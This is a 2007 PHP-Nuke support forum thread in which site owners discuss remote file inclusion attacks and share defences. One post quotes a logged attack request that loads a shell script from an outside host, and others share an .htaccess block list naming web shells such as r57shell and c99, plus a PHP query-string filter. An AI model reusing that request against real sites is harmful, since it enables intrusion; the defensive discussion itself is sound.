You are missing our premiere tool bar navigation system! Register and use it for FREE!

NukeCops  
•  Home •  Downloads •  Gallery •  Your Account •  Forums • 
Readme First
- Readme First! -

Read and follow the rules, otherwise your posts will be closed
Modules
· Home
· FAQ
· Buy a Theme
· Advertising
· AvantGo
· Bookmarks
· Columbia
· Community
· Donations
· Downloads
· Feedback
· Forums
· PHP-Nuke HOWTO
· Private Messages
· Search
· Statistics
· Stories Archive
· Submit News
· Surveys
· Theme Gallery
· Top
· Topics
· Your Account
Who's Online
There are currently, 279 guest(s) and 28 member(s) that are online.

You are Anonymous user. You can register for free by clicking here
Nuke Cops :: View topic - Is this an attack?? [ ]
 Forum FAQ  •  Search  •   •  Memberlist  •  Usergroups   •  Register  •  Profile •    •  Log in to check your private messages  •  Log in

 
Post new topic  Reply to topicprinter-friendly view
View previous topic Log in to check your private messages View next topic
Author Message
Evaders99
Site Admin
Site Admin


Joined: Aug 17, 2003
Posts: 12482


PostPosted: Wed Oct 17, 2007 3:25 pm Reply with quoteBack to top

Well Sentinel does that kind of blocking code. It can also report abusers to your email and ban their IP. You can easily tell Sentinel to block silently if you're not concerned about email reports

_________________
Helping those that help themselves
Read FIRST or DIE!

"Fighting is terrible, but not as terrible as losing the will to fight."
Star Wars Rebellion Network - Need Help? Evaders Squadron Coding
Find all posts by Evaders99View user's profileSend private messageVisit poster's websiteAIM Address
XenoMorpH
Lieutenant
Lieutenant


Joined: Aug 24, 2003
Posts: 187

Location: Coevorden, Netherlands

PostPosted: Sat Oct 20, 2007 2:50 am Reply with quoteBack to top

I'm getting about 20-30 blocks a day by this shell url. Wen people try to hack my site, I'm tracing back the source of the file and email the web/server owner about this. This way I have shut down alot of those urls with those shells. Most of them were hosted on free accounts of tripod.lycos or yahoo, so it was easy to shut them down. But with this site it's not that easy.... Evil or Very Mad

_________________
http://www.tdi-hq.com
MSN- status: Image
Find all posts by XenoMorpHView user's profileSend private message
drdan01
Corporal
Corporal


Joined: Dec 23, 2004
Posts: 66


PostPosted: Sat Dec 22, 2007 8:32 pm Reply with quoteBack to top

I hate to jump onto this thread but it looks like I'm having this exact same bunch of hackers after me.

I've been posting in a couple of threads about something that I've been seeing on my site. Am running Nuke 7.5 and Sentinel, and it looks like I've got the same guys after me as the original poster. But I'm wondering if they're getting through. Here's what I've been seeing and in the static portion of my site:

Quote:
/static.php?file=http://amyru.h18.ru/images/cs.txt?


Do the above suggestions apply to me, things that I should modify/change?
Find all posts by drdan01View user's profileSend private message
drdan01
Corporal
Corporal


Joined: Dec 23, 2004
Posts: 66


PostPosted: Sat Dec 22, 2007 9:57 pm Reply with quoteBack to top

Quote:


RewriteEngine On

RewriteCond %{HTTP_USER_AGENT} ^libwww(-FM|-perl) [OR]
RewriteCond %{HTTP_USER_AGENT} Indy\ Library [NC,OR]
RewriteCond % _CONF [OR]
RewriteCond % tool25 [OR]
RewriteCond % cmd.txt [OR]
RewriteCond % r57shell [OR]
RewriteCond % c99 [OR]
RewriteCond % THEME_DIR
RewriteRule ^.* - [F,L]

RewriteEngine on

RewriteCond %{QUERY_STRING} .*http:\/\/.*
Rewriterule ^.* - [F]]



I did try adding the above in my htaccess, but something wasn't right as I then couldn't access my site....ended up taking it back out...site access is fine again.
Find all posts by drdan01View user's profileSend private message
drdan01
Corporal
Corporal


Joined: Dec 23, 2004
Posts: 66


PostPosted: Sun Dec 23, 2007 6:23 am Reply with quoteBack to top

telli wrote:
All of these attacks require loading a file from another server so they have to use a direct link to it. You can block that by simply adding this line of code to your config.php.

Code:

//http and https should not be used in any query string
if (eregi('http', $_SERVER['QUERY_STRING']) || eregi('https', $_SERVER['QUERY_STRING'])) {
   header('Location: http://' . $_SERVER['SERVER_NAME']);
   exit;
}



I did try the above and based on my logs it looks like it's now been about 12 hours since the last successful attack.

And have also discovered that I can add the following to my htaccess file and not have site problems like when adding the entire recommended addition:

Quote:
RewriteCond %{QUERY_STRING} .*http:\/\/.*
Rewriterule ^.* - [F]

Find all posts by drdan01View user's profileSend private message
Display posts from previous:      
Post new topic  Reply to topicprinter-friendly view
View previous topic Log in to check your private messages View next topic
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum



Powered by phpBB © 2001, 2005 phpBB Group

Ported by Nuke Cops © 2003 www.nukecops.com
:: FI Theme :: PHP-Nuke theme by coldblooded (www.nukemods.com) ::
Powered by TOGETHER TEAM srl ITALY http://www.togetherteam.it - DONDELEO E-COMMERCE http://www.DonDeLeo.com - TUTTISU E-COMMERCE http://www.tuttisu.it
Web site engine's code is Copyright © 2002 by PHP-Nuke. All Rights Reserved. PHP-Nuke is Free Software released under the GNU/GPL license.
Page Generation: 0.079 Seconds - 327 pages served in past 5 minutes. Nuke Cops Founded by Paul Laudanski (Zhen-Xjell)
:: FI Theme :: PHP-Nuke theme by coldblooded (www.nukemods.com) ::